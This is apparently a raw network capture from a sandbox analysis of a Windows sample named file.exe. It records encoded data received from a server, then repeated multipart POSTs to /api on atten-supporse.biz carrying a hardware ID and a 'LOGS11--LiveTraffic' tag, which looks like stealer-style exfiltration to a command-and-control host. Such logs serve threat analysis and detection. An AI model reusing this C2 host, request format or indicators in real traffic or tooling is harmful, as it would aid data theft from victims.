                                                                                                                                                                                                        2024-12-02 06:37:30 UTC350INData Raw: 34 34 38 38 0d 0a 50 6b 66 37 31 54 66 72 57 6c 31 47 6c 4a 77 4b 48 58 47 77 4c 52 30 44 7a 61 4a 74 31 68 51 50 78 56 32 30 32 2f 30 78 66 72 4a 46 5a 59 33 33 44 64 39 32 66 7a 58 78 76 6a 42 70 41 38 56 49 4d 53 47 73 78 6b 2f 73 63 6d 36 70 4c 74 48 33 33 30 63 54 6b 41 51 68 6d 72 6c 45 6a 6e 5a 2f 49 2b 79 2b 4d 45 59 4b 6b 6b 68 7a 49 66 65 41 43 4c 78 32 62 71 6b 2f 31 62 43 53 51 52 4c 52 56 69 75 63 76 56 4b 49 50 6a 77 71 2b 66 6c 76 65 42 44 61 51 33 52 75 70 63 39 50 2b 6a 5a 71 76 33 2b 4f 2b 62 42 55 43 74 4e 7a 4a 6f 69 2b 46 5a 5a 32 4a 6d 54 78 38 69 67 6e 55 39 46 49 66 32 2b 72 78 67 61 2b 66 47 65 68 50 74 43 78 6a 56 67 59 32 6c 59 6c 6e 37 78 59 67 53 6f 78 49 50 37 79 61 58 49 51 6b 67 45 2f 5a 72 65 41 56 2f 51 6c 58 36 51 75 78
                                                                                                                                                                                                        Data Ascii: 4488Pkf71TfrWl1GlJwKHXGwLR0DzaJt1hQPxV202/0xfrJFZY33Dd92fzXxvjBpA8VIMSGsxk/scm6pLtH330cTkAQhmrlEjnZ/I+y+MEYKkkhzIfeACLx2bqk/1bCSQRLRViucvVKIPjwq+flveBDaQ3Rupc9P+jZqv3+O+bBUCtNzJoi+FZZ2JmTx8ignU9FIf2+rxga+fGehPtCxjVgY2lYln7xYgSoxIP7yaXIQkgE/ZreAV/QlX6Qux
                                                                                                                                                                                                        2024-12-02 06:37:30 UTC1369INData Raw: 6e 37 6c 55 68 44 67 74 4c 50 33 31 62 57 30 59 32 30 4a 79 59 61 4c 4b 41 4c 64 32 61 71 30 31 32 62 4f 62 58 68 48 57 58 43 58 5a 2b 52 57 4f 49 48 39 38 74 74 31 74 62 78 54 65 57 54 31 62 37 39 39 42 72 54 5a 71 71 33 2b 4f 2b 5a 64 57 48 39 4e 58 4b 70 71 2f 58 70 73 34 4c 53 4c 37 2b 33 70 35 46 74 78 46 66 48 4f 6c 7a 67 6d 33 66 32 61 75 4f 74 47 39 33 78 31 63 31 30 52 6c 77 66 64 30 68 44 4d 7a 4c 75 48 2b 4b 47 42 64 79 77 39 34 62 65 2b 59 54 37 42 33 61 61 59 37 32 4c 65 62 58 78 72 65 55 53 71 66 76 56 57 4f 4d 6a 63 73 39 2f 4e 6a 63 42 50 58 51 6e 74 6e 6f 38 45 4b 39 44 67 74 6f 43 65 57 34 64 39 39 47 39 4e 4f 5a 36 79 30 57 34 63 2f 4b 57 54 70 73 48 45 2f 46 4e 34 50 4a 79 47 68 78 51 43 6d 64 33 2b 69 4d 63 53 31 6d 6c 55 52 30 31 49
                                                                                                                                                                                                        Data Ascii: n7lUhDgtLP31bW0Y20JyYaLKALd2aq012bObXhHWXCXZ+RWOIH98tt1tbxTeWT1b799BrTZqq3+O+ZdWH9NXKpq/Xps4LSL7+3p5FtxFfHOlzgm3f2auOtG93x1c10Rlwfd0hDMzLuH+KGBdyw94be+YT7B3aaY72LebXxreUSqfvVWOMjcs9/NjcBPXQntno8EK9DgtoCeW4d99G9NOZ6y0W4c/KWTpsHE/FN4PJyGhxQCmd3+iMcS1mlUR01I
                                                                                                                                                                                                        2024-12-02 06:37:30 UTC1369INData Raw: 34 63 2f 4b 57 54 70 73 48 45 2f 46 4e 34 50 4a 79 47 6a 79 51 2b 2f 66 47 6d 6e 4f 4e 75 38 6e 46 51 66 33 56 73 76 6c 37 42 52 68 54 45 79 49 76 62 35 62 48 6f 42 31 30 5a 7a 62 65 2b 4f 54 37 4e 75 4c 66 39 2f 2b 62 36 4a 55 44 50 54 54 53 7a 5a 71 42 75 51 65 44 67 6f 74 71 59 6f 65 42 62 61 52 48 6c 70 72 39 49 4b 75 6e 31 73 72 54 6e 58 74 4a 4e 56 48 4e 46 63 49 35 57 33 55 6f 34 71 4c 53 48 77 37 47 49 2f 58 5a 4a 49 5a 79 48 33 67 44 6d 6b 59 58 79 78 66 65 4f 36 6b 56 30 62 78 68 77 36 31 36 34 56 6a 6a 52 2f 66 4c 62 31 61 48 4d 55 32 6b 6c 37 61 61 44 50 42 71 5a 33 59 61 6b 74 30 62 6d 57 58 52 50 63 56 53 69 65 75 6c 36 44 4e 54 73 6a 39 37 34 6d 50 78 54 4b 44 79 63 68 6d 64 41 43 75 46 68 6d 71 7a 61 57 70 74 46 4b 58 4e 64 51 5a 63 48 33
                                                                                                                                                                                                        Data Ascii: 4c/KWTpsHE/FN4PJyGjyQ+/fGmnONu8nFQf3Vsvl7BRhTEyIvb5bHoB10Zzbe+OT7NuLf9/+b6JUDPTTSzZqBuQeDgotqYoeBbaRHlpr9IKun1srTnXtJNVHNFcI5W3Uo4qLSHw7GI/XZJIZyH3gDmkYXyxfeO6kV0bxhw6164VjjR/fLb1aHMU2kl7aaDPBqZ3Yakt0bmWXRPcVSieul6DNTsj974mPxTKDychmdACuFhmqzaWptFKXNdQZcH3
                                                                                                                                                                                                        2024-12-02 06:37:30 UTC1369INData Raw: 41 6c 38 76 74 74 65 78 54 57 53 58 41 68 34 59 41 49 72 44 59 31 35 78 44 78 6a 4e 31 79 4a 70 42 44 61 34 44 33 55 6f 56 34 5a 32 54 36 2f 57 52 33 48 4e 52 47 63 32 75 6d 79 77 4f 2f 63 6d 47 75 4f 74 43 34 6d 6c 59 64 31 46 41 76 6e 37 52 57 68 6a 63 77 4c 4c 61 77 4b 48 67 4c 6b 68 63 2f 52 4c 6a 4c 41 62 49 32 63 75 6b 6d 6c 72 36 54 45 30 53 51 55 43 79 66 73 56 43 46 4f 54 6b 73 38 2f 5a 73 66 68 58 55 54 48 42 6c 71 73 45 41 73 48 70 6a 72 54 37 58 74 5a 52 63 46 39 55 63 61 39 6d 77 54 63 6c 67 66 78 58 31 36 48 39 76 48 35 4a 51 4d 58 6a 76 78 77 50 30 4c 69 32 6d 4c 64 79 7a 6b 56 59 54 31 56 38 71 6e 72 70 54 68 54 49 32 4c 50 44 78 59 57 30 51 33 6b 46 34 62 36 50 4f 41 72 35 31 59 4f 64 78 6c 72 36 48 45 30 53 51 63 43 4b 55 6d 56 36 46 50
                                                                                                                                                                                                        Data Ascii: Al8vttexTWSXAh4YAIrDY15xDxjN1yJpBDa4D3UoV4Z2T6/WR3HNRGc2umywO/cmGuOtC4mlYd1FAvn7RWhjcwLLawKHgLkhc/RLjLAbI2cukmlr6TE0SQUCyfsVCFOTks8/ZsfhXUTHBlqsEAsHpjrT7XtZRcF9Uca9mwTclgfxX16H9vH5JQMXjvxwP0Li2mLdyzkVYT1V8qnrpThTI2LPDxYW0Q3kF4b6POAr51YOdxlr6HE0SQcCKUmV6FP
                                                                                                                                                                                                        2024-12-02 06:37:30 UTC1369INData Raw: 73 4b 44 46 54 31 56 63 2f 4f 65 2f 32 43 4b 52 6d 62 75 55 4f 77 4c 71 4a 57 42 48 63 48 44 72 58 72 68 57 4f 4e 48 39 38 74 76 68 6e 64 68 44 64 54 6e 5a 74 6f 73 55 47 73 58 64 72 6f 7a 58 63 75 5a 6c 56 48 64 56 57 4a 70 69 39 58 49 34 77 4f 43 66 6b 76 69 59 2f 46 4d 6f 50 4a 79 47 47 78 78 32 36 5a 69 32 34 63 63 2f 35 6d 46 39 63 69 42 77 68 6b 37 68 52 6a 6a 51 35 49 66 44 7a 61 58 41 53 30 6b 42 37 61 71 62 47 44 72 6c 7a 59 4b 4d 74 33 4c 4b 51 58 78 58 63 55 57 58 58 39 31 4b 52 65 47 64 6b 78 2f 4e 6d 63 52 54 45 44 32 41 76 74 6f 41 49 75 44 59 31 35 7a 37 61 74 70 78 63 48 39 4e 64 4c 34 75 6c 57 59 41 77 4f 69 6a 39 38 47 35 74 46 64 31 47 66 47 4b 6d 78 77 65 34 66 47 36 67 66 35 6a 35 6d 45 74 63 69 42 77 47 6a 71 64 59 79 53 64 78 50 62
                                                                                                                                                                                                        Data Ascii: sKDFT1Vc/Oe/2CKRmbuUOwLqJWBHcHDrXrhWONH98tvhndhDdTnZtosUGsXdrozXcuZlVHdVWJpi9XI4wOCfkviY/FMoPJyGGxx26Zi24cc/5mF9ciBwhk7hRjjQ5IfDzaXAS0kB7aqbGDrlzYKMt3LKQXxXcUWXX91KReGdkx/NmcRTED2AvtoAIuDY15z7atpxcH9NdL4ulWYAwOij98G5tFd1GfGKmxwe4fG6gf5j5mEtciBwGjqdYySdxPb
                                                                                                                                                                                                        2024-12-02 06:37:30 UTC1369INData Raw: 46 4e 52 42 62 57 53 70 7a 77 43 39 66 32 6d 76 50 4e 61 39 6d 31 51 5a 30 31 41 75 6e 72 52 61 6a 54 45 78 4c 66 6d 2b 4a 6a 38 55 79 67 38 6e 49 59 37 62 44 4c 68 37 4c 62 68 78 7a 2f 6d 59 58 31 79 49 48 43 6d 58 73 6c 57 44 50 6a 73 68 38 50 52 74 66 78 6a 52 51 48 74 6e 71 38 38 50 76 33 39 73 6f 54 72 63 73 70 6c 65 48 39 5a 61 5a 64 66 33 55 70 46 34 5a 32 54 57 35 57 56 7a 46 4a 4a 51 4d 58 6a 76 78 77 50 30 4c 69 32 73 4d 39 4b 2b 6e 31 34 66 32 46 6b 68 6b 37 4a 56 67 53 6f 33 4a 50 48 73 65 6e 38 61 31 30 4e 38 59 61 76 47 42 72 4a 31 61 65 64 78 6c 72 36 48 45 30 53 51 63 53 6d 65 6e 6c 4b 53 65 43 42 71 37 37 35 76 63 31 4f 4b 44 33 35 71 70 63 38 43 74 33 42 75 72 44 72 63 75 4a 68 62 45 63 4a 66 4b 70 61 7a 56 59 59 2b 4f 53 58 35 2b 47 39
                                                                                                                                                                                                        Data Ascii: FNRBbWSpzwC9f2mvPNa9m1QZ01AunrRajTExLfm+Jj8Uyg8nIY7bDLh7Lbhxz/mYX1yIHCmXslWDPjsh8PRtfxjRQHtnq88Pv39soTrcspleH9ZaZdf3UpF4Z2TW5WVzFJJQMXjvxwP0Li2sM9K+n14f2Fkhk7JVgSo3JPHsen8a10N8YavGBrJ1aedxlr6HE0SQcSmenlKSeCBq775vc1OKD35qpc8Ct3BurDrcuJhbEcJfKpazVYY+OSX5+G9
                                                                                                                                                                                                        2024-12-02 06:37:30 UTC1369INData Raw: 58 77 6d 6b 66 34 6f 6f 6e 78 71 74 7a 6a 42 74 74 38 64 58 4e 38 63 66 61 44 33 58 49 34 6a 4c 6a 4c 37 37 6d 38 2f 4c 4a 77 50 5a 79 48 33 67 44 71 33 65 47 4f 67 4b 63 66 30 75 45 55 57 31 30 77 69 6a 72 67 56 78 33 67 35 5a 4b 36 74 4a 6a 38 58 77 77 38 6e 4d 66 32 62 57 75 63 68 50 66 55 67 6d 4b 44 66 52 56 79 49 44 6d 76 5a 70 52 58 52 65 48 67 6e 35 4f 78 75 66 41 58 52 43 45 46 66 69 4e 6f 43 73 6d 46 38 6d 51 48 52 6f 35 4a 56 43 38 45 51 4d 4a 71 35 57 34 34 75 66 32 71 32 38 53 67 6e 4b 70 49 48 50 31 37 68 67 42 66 30 4c 69 32 53 50 4e 69 33 6d 45 55 4e 6e 58 73 2f 6c 4c 46 43 6d 48 68 78 5a 50 43 2b 4d 43 39 64 6b 6b 74 75 49 66 65 51 58 65 38 6a 50 76 42 76 68 4b 62 52 53 6c 7a 47 48 48 33 4c 2b 52 57 62 65 47 64 6b 73 66 31 36 62 52 58 52
                                                                                                                                                                                                        Data Ascii: Xwmkf4oonxqtzjBtt8dXN8cfaD3XI4jLjL77m8/LJwPZyH3gDq3eGOgKcf0uEUW10wijrgVx3g5ZK6tJj8Xww8nMf2bWuchPfUgmKDfRVyIDmvZpRXReHgn5OxufAXRCEFfiNoCsmF8mQHRo5JVC8EQMJq5W44uf2q28SgnKpIHP17hgBf0Li2SPNi3mEUNnXs/lLFCmHhxZPC+MC9dkktuIfeQXe8jPvBvhKbRSlzGHH3L+RWbeGdksf16bRXR
                                                                                                                                                                                                        2024-12-02 06:37:30 UTC1369INData Raw: 2f 59 54 2b 77 32 57 4b 51 78 32 4c 36 4a 51 6c 48 33 55 69 4b 59 6f 55 57 65 4e 33 39 71 74 76 67 6f 4a 30 47 63 44 33 74 77 37 35 68 66 35 69 30 34 39 47 69 47 36 34 41 64 42 5a 42 4b 5a 63 48 6c 47 38 6b 71 66 33 79 32 75 57 74 74 41 64 52 4d 61 57 4c 6f 2f 6a 47 54 65 47 71 6d 4b 63 61 75 6b 42 77 79 35 6e 30 62 70 36 4a 57 68 7a 59 34 4d 75 65 2b 4a 6a 38 63 6b 68 64 47 49 65 65 41 4d 50 6f 32 64 65 64 6e 6c 6f 79 63 58 52 4c 58 53 6a 54 55 6b 46 75 4f 4f 53 6b 30 34 66 45 6e 55 53 58 7a 44 7a 45 68 71 59 42 58 35 6a 67 74 6f 79 36 57 34 63 38 42 52 34 55 50 63 73 6e 6c 53 73 63 68 66 7a 4b 32 70 6a 6f 78 55 38 41 50 4a 79 48 6f 77 78 32 6d 63 47 36 78 50 4a 47 48 6f 58 51 53 31 31 30 7a 69 62 70 5a 71 44 73 75 4c 73 6a 41 66 58 77 64 33 45 68 70 63
                                                                                                                                                                                                        Data Ascii: /YT+w2WKQx2L6JQlH3UiKYoUWeN39qtvgoJ0GcD3tw75hf5i049GiG64AdBZBKZcHlG8kqf3y2uWttAdRMaWLo/jGTeGqmKcaukBwy5n0bp6JWhzY4Mue+Jj8ckhdGIeeAMPo2dednloycXRLXSjTUkFuOOSk04fEnUSXzDzEhqYBX5jgtoy6W4c8BR4UPcsnlSschfzK2pjoxU8APJyHowx2mcG6xPJGHoXQS110zibpZqDsuLsjAfXwd3Ehpc
                                                                                                                                                                                                        2024-12-02 06:37:30 UTC1369INData Raw: 36 64 58 2b 31 4f 64 57 76 6e 42 51 69 37 6e 45 33 6e 71 64 57 79 77 6b 79 49 4f 44 72 61 32 38 55 37 48 46 53 63 36 6a 51 44 50 5a 61 61 71 6f 7a 36 49 65 6f 51 68 76 41 48 67 4f 61 6f 56 62 4a 64 6e 38 38 74 71 59 6f 55 67 48 56 58 33 77 6a 67 38 63 43 75 44 5a 79 36 53 61 57 72 39 38 4c 54 35 34 63 4e 39 6e 76 46 63 34 37 4c 54 62 77 2f 58 35 38 56 4f 78 78 55 6e 4f 6f 30 41 7a 32 52 32 43 6a 4b 63 4f 36 6a 31 51 69 37 6e 45 33 6e 71 64 57 79 78 30 46 5a 73 66 6f 61 33 38 64 31 51 38 78 49 62 65 41 56 2f 52 62 66 36 41 76 31 66 75 36 61 56 37 68 53 69 61 5a 75 56 4c 4a 64 6e 38 6f 74 71 59 6f 63 67 48 56 58 33 77 74 71 4e 6f 49 39 47 6b 6a 76 6e 2f 41 2b 63 63 41 55 70 42 4f 5a 63 48 33 45 6f 63 31 50 69 66 34 2f 58 70 74 46 64 46 5a 66 43 61 52 2f 69
                                                                                                                                                                                                        Data Ascii: 6dX+1OdWvnBQi7nE3nqdWywkyIODra28U7HFSc6jQDPZaaqoz6IeoQhvAHgOaoVbJdn88tqYoUgHVX3wjg8cCuDZy6SaWr98LT54cN9nvFc47LTbw/X58VOxxUnOo0Az2R2CjKcO6j1Qi7nE3nqdWyx0FZsfoa38d1Q8xIbeAV/Rbf6Av1fu6aV7hSiaZuVLJdn8otqYocgHVX3wtqNoI9Gkjvn/A+ccAUpBOZcH3Eoc1Pif4/XptFdFZfCaR/i


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        2192.168.2.849707104.21.16.94436376C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:37:32 UTC285OUTPOST /api HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=W5GA7MGRW3D5OZMX9OM
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                        Content-Length: 12858
                                                                                                                                                                                                        Host: atten-supporse.biz
                                                                                                                                                                                                        2024-12-02 06:37:32 UTC12858OUTData Raw: 2d 2d 57 35 47 41 37 4d 47 52 57 33 44 35 4f 5a 4d 58 39 4f 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 30 33 43 36 35 45 39 42 36 34 46 36 31 37 42 35 38 44 36 44 41 32 34 31 34 33 34 46 44 30 38 0d 0a 2d 2d 57 35 47 41 37 4d 47 52 57 33 44 35 4f 5a 4d 58 39 4f 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 35 47 41 37 4d 47 52 57 33 44 35 4f 5a 4d 58 39 4f 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                                                                                                                                        Data Ascii: --W5GA7MGRW3D5OZMX9OMContent-Disposition: form-data; name="hwid"603C65E9B64F617B58D6DA241434FD08--W5GA7MGRW3D5OZMX9OMContent-Disposition: form-data; name="pid"2--W5GA7MGRW3D5OZMX9OMContent-Disposition: form-data; name="lid"LOGS11--Li
                                                                                                                                                                                                        2024-12-02 06:37:33 UTC1028INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:37:33 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Set-Cookie: PHPSESSID=v0n9572u7860h33sn20qeghf66; expires=Fri, 28-Mar-2025 00:24:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rSolPb0yqQA%2B8gTy%2BWPKZiSn7scttMlYBz4esS8PF9UOD6YcJVx1sDPVbo96jgiZzShl%2F1GWMzhib4Mu3QZ1hjZGV87s29fqpEq%2BaAjO%2F7LH6uH%2BgHMRo%2BISXCp8MoNqTAlCBEQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8eb94f15e8c54344-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1652&min_rtt=1651&rtt_var=621&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2846&recv_bytes=13801&delivery_rate=1759036&cwnd=220&unsent_bytes=0&cid=b7c3c85896aefba4&ts=1000&x=0"
                                                                                                                                                                                                        2024-12-02 06:37:33 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                        Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                        2024-12-02 06:37:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        3192.168.2.849708104.21.16.94436376C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:37:34 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=NMNTLM31RM
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                        Content-Length: 15033
                                                                                                                                                                                                        Host: atten-supporse.biz
                                                                                                                                                                                                        2024-12-02 06:37:34 UTC15033OUTData Raw: 2d 2d 4e 4d 4e 54 4c 4d 33 31 52 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 30 33 43 36 35 45 39 42 36 34 46 36 31 37 42 35 38 44 36 44 41 32 34 31 34 33 34 46 44 30 38 0d 0a 2d 2d 4e 4d 4e 54 4c 4d 33 31 52 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 4d 4e 54 4c 4d 33 31 52 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4e 4d 4e 54 4c 4d 33 31 52 4d 0d 0a 43 6f
                                                                                                                                                                                                        Data Ascii: --NMNTLM31RMContent-Disposition: form-data; name="hwid"603C65E9B64F617B58D6DA241434FD08--NMNTLM31RMContent-Disposition: form-data; name="pid"2--NMNTLM31RMContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--NMNTLM31RMCo
                                                                                                                                                                                                        2024-12-02 06:37:36 UTC1023INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:37:35 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Set-Cookie: PHPSESSID=7di36ftkg3a77goh23ngeo4duu; expires=Fri, 28-Mar-2025 00:24:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KWLImXaKn8f6bwWZJ3%2FMCjQ9C1k32Kocc2FfXbjtqOXePQJY3P3ZRS%2Fyv3MnCLXn0h%2F9yWsWL6KCvTvX%2BzQrZYIohCYgt1liyLbugK4KqBbtP%2BE8gtTowQjl5iRXwriGPHkoMVA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8eb94f24dcb9424d-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1589&rtt_var=610&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2847&recv_bytes=15967&delivery_rate=1775075&cwnd=226&unsent_bytes=0&cid=8b5879962025e97f&ts=1460&x=0"
                                                                                                                                                                                                        2024-12-02 06:37:36 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                        Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                        2024-12-02 06:37:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        4192.168.2.849709104.21.16.94436376C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:37:37 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=C3E3XTWX7ETRECJ3ZW
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                        Content-Length: 20248
                                                                                                                                                                                                        Host: atten-supporse.biz
                                                                                                                                                                                                        2024-12-02 06:37:37 UTC15331OUTData Raw: 2d 2d 43 33 45 33 58 54 57 58 37 45 54 52 45 43 4a 33 5a 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 30 33 43 36 35 45 39 42 36 34 46 36 31 37 42 35 38 44 36 44 41 32 34 31 34 33 34 46 44 30 38 0d 0a 2d 2d 43 33 45 33 58 54 57 58 37 45 54 52 45 43 4a 33 5a 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 43 33 45 33 58 54 57 58 37 45 54 52 45 43 4a 33 5a 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54
                                                                                                                                                                                                        Data Ascii: --C3E3XTWX7ETRECJ3ZWContent-Disposition: form-data; name="hwid"603C65E9B64F617B58D6DA241434FD08--C3E3XTWX7ETRECJ3ZWContent-Disposition: form-data; name="pid"3--C3E3XTWX7ETRECJ3ZWContent-Disposition: form-data; name="lid"LOGS11--LiveT
                                                                                                                                                                                                        2024-12-02 06:37:37 UTC4917OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8
                                                                                                                                                                                                        2024-12-02 06:37:39 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:37:38 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Set-Cookie: PHPSESSID=d5q67gupeap27lskq2558ifnu4; expires=Fri, 28-Mar-2025 00:24:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yoisKv5XxHqpMy50%2FYP6HalpdMldjsfFbDAxs7BW1WYf4HoUtUFcX5fHxkThrgBEP1VctU36KFExMWx92iKspfGNxK9QRV40zD2ahVz%2FUnSCRmnk40TCmWTpyRuXQTAKT2iheog%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8eb94f36f9bb1891-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
